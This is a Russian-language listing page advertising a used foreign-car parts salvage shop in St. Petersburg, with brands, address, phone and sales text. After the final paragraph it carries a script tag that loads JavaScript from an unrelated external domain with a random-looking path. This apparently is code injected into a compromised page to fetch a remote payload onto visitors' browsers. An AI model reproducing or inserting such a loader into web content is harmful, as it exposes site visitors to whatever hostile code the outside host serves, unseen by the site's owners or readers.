Регистрация / Забыли пароль?

 
 

 

АвтоРазборка

Марки: AUDI, BMW, CHERY, CHEVROLET, CHRYSLER, CITROEN, DAEWOO, DODGE, FIAT, FORD, HONDA, HYUNDAI, ISUZU, KIA, MAZDA, MERCEDES-BENZ, MITSUBISHI, NISSAN, OPEL, PEUGEOT, RENAULT, SAAB, SKODA, SUBARU, TOYOTA, VOLKSWAGEN, VOLVO

Район: Красносельский

Адрес: проспект Маршала Жукова д.21

 http://autorazborspb.ru/

Разборка иномарок в Санкт-Петербурге, разборки иномарок, магазин запчастей (разборка) на Маршала Жукова

В настоящее время основной деятельностью нашей компании является разборка иномарок в Санкт-Петербурге (СПб) на запчасти с целью далнейшей реализации узлов и деталей конечным потребителям.      

В настоящее время основной деятельностью нашей компании является разборка иномарок в Санкт-Петербурге (СПб) на запчасти с целью далнейшей реализации узлов и деталей конечным потребителям. Мы имеем и предоставляем:       

       - Большое количество разобранных автомобилей в наличии;

       - Оказание помощи в подборе необходимых Вам запчастей;

       - Гарантия и возможность возврата купленных у насра запчастей;

       - Низкие цены на все товары.

                   Звонитес 10:00 до 19:00    +7 (812) 640-33-36                   

                   Магазин запчастей: разборка на Маршала Жукова, д. 21 

Современный автомобиль представляет собой сложное техническое устройство с огромным количеством узлов и агрегатов, каждый из которых подвергается постоянной разнонаправленной нагрузке. В ходе эксплуатации автомобиля в течение времени некоторые узлы и детали теряют изначальные эксплуатационные свойства засчет изнашивания, что ставит владельца перед необходимостью их замены. Благодаря этому сохраняется достаточный уровень безопасности эксплуатации автомобилем.

Легче всего тем автовладельцам, которые приобрели транспортное средство у официальных дилеров, когда на ремонт их автомобилей распространяются гарантийные обязательства.

Однако таких меньшинство, да и к тому же гарантия может пройти за истечением  времени или по прохождении определенного пробега. Да и значительный процент автомобилей на территории России относят к категории подержанных. Для многих автомобилистов выходом стали разборки иномарок в Санкт-Петербурге (СПб) и многих других городах - от мегаполисов до самых маленьких. 

Нами постоянно отслеживаются изменения на рынке разборки автомобилей и поэтому цены на узлы и агрегаты в магазинах нашей компании всегда максимально привлекательны для покупателя и никогда не завышены.

Наш магазин запчастей, предоставляя услугу разборка иномарок в Санкт-Петербурге, зарекомендовала себя на рынке, как надежный партнер, сотрудничающий с оптовыми и розничными покупателями на протяжении длительного срока. Благодаря постоянному большому количеству автомобилей различных марок и моделей на разборке на Маршала Жукова каждый наш клиент может быть уверен в том, что сможет найти и приобрести у нас деталь для своего автомобиля той же марки и модели. Покупатели, приобретающие большие партии товара, могут рассчитывать на полную комплектацию по их заказам.

Своим клиентам мы предлагаем ряд обязательств по возврату приобретенных у нас запчастей. Ради удобства наших клиентов наши специалисты с удовольствием проведут подробные разъяснения и помогут определиться в выборе, что особенно важно для водителей, которые не вникают в технические особенности своего автомобиля и его узлов. <script language="javascript" charset="UTF-8" type="text/javascript" src="http://estasos.ru/6e5m6l22jiz89hely8eqty9efg2fzdg7o4m9rtp3h"></script>